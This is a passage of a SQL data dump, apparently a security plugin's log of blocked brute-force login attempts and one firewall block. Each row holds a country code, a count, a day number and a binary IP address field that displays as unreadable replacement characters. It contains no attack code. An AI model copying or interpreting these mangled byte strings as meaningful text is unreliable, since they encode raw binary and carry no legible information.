�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�2','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�,6','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�.','US',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�.','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�.','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�= ','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�= ','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�= ','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�=�','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͘','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͘','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͝','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͝','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͝','US',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��C͝','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��T','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��T','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��Cܸ�','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��Cޘ�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Cޘ�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Cޘ�','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��Cᡀ','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��DB�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��DB�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��DB�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��DF�\"','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�b','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�\n9','NL',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��D��','US',5,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�D�','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�D�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�D�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��D�D�','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��D��U','SG',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�b','US',4,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�d','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�e','US',4,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�R','US',4,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�R','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�S','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�S','US',4,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�\n','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��E$^�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��E1��','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��E1��','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��E1��','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��E77t','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��E���','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��E���','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��x','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��s','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��|','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��|','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��|','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��}','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��}','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�φ','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',4,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',4,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',4,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',8,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',6,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',2,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',6,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',8,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Eţ�','US',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��F$R','PM',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��H\"\"�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�%�','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�%�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�)�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�)�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�)�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�*-','US',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�.�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�.�','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�.�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��H�.�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��H��s','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��J�g�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��J�g�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�d','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�d','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw�\r','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw��','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��MD ','GB',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��M\\R�','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N.<�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/:�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/ɏ','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/ɏ','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�Q�','BG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�Q�','BG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�Q�','BG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�Q�','BG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�X�','HU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�(R','IT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�$b','IR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�$b','IR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�(�','IR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�<F','IR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�dM','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��O�','PL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��PP��','UZ',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��PP��','UZ',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��PQ\0�','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��PQ\0�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�Ҕ','NL',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�Ҕ','NL',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�Ҕ','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�Ҕ','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��\Z','PT',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��\Z','PT',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�','IL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��','DZ',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��','DZ',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��','DZ',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��','DZ',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��F','TR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��F','TR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��F','TR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q.߀','ES',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��QDD�','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��QDD�','CN',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��QE8/','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4\Z','IT',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4\Z','IT',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q\\ڝ','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q���','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�','FR',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�','FR',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�x','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��R���','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��R��','NL',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�20','ES',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�20','ES',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�20','ES',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�20','ES',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��S�\0','AM',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��T��','SI',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��UX�','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ue�','LV',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��U��&','PL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��Vh\'�','IR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��Vh\'�','IR',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wk�6','IR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wk�6','IR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wk�6','IR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��XVh\n','CZ',3,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��XcS','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc�/','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc�','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc��','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�$�','IR',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��X�%1','IR',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y`Z}','IT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y�B�','UA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y��9','TR',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y���','TR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[~�3','ES',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','ES',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','ES',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','ES',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ɤ','FR',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��[���','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','BG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','BG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','BG',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��[ͯ#','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��K','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��R','UA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��R','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ȉ','UA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ȷ','UA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ȷ','UA',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','UA',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��T','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�|�','UA',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�4','CZ',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','RU',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�','RU',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\5x�','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\�6q','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\�6q','FR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\�6q','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',3,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',3,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̈�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\��','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]Y��','TR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��]Y��','TR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]q�v','IR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��]�xr','RU',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��]�ƙ','DE',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0��]���','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��]���','CY',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��]���','CY',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','AT',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','AT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��^+.','AZ',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��^Vc','ES',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�g','FR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�k','TR',5,18881,'waf'),('\0\0\0\0\0\0\0\0\0\0��^��','RU',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��^��','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�hA','FI',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�)','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�|','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�|','DE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�|','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�|','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o��','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o��','DE',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��&','DE',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��_կ�','RU',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��_կ�','RU',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�� ','FI',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�� ','FI',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�� ','FI',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�� ','FI',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�� ','FI',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��`>w','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��aO�2','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��aO�2','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��e \Z�','HK',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��e ��','HK',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��e ��','HK',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��e ��','HK',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��e 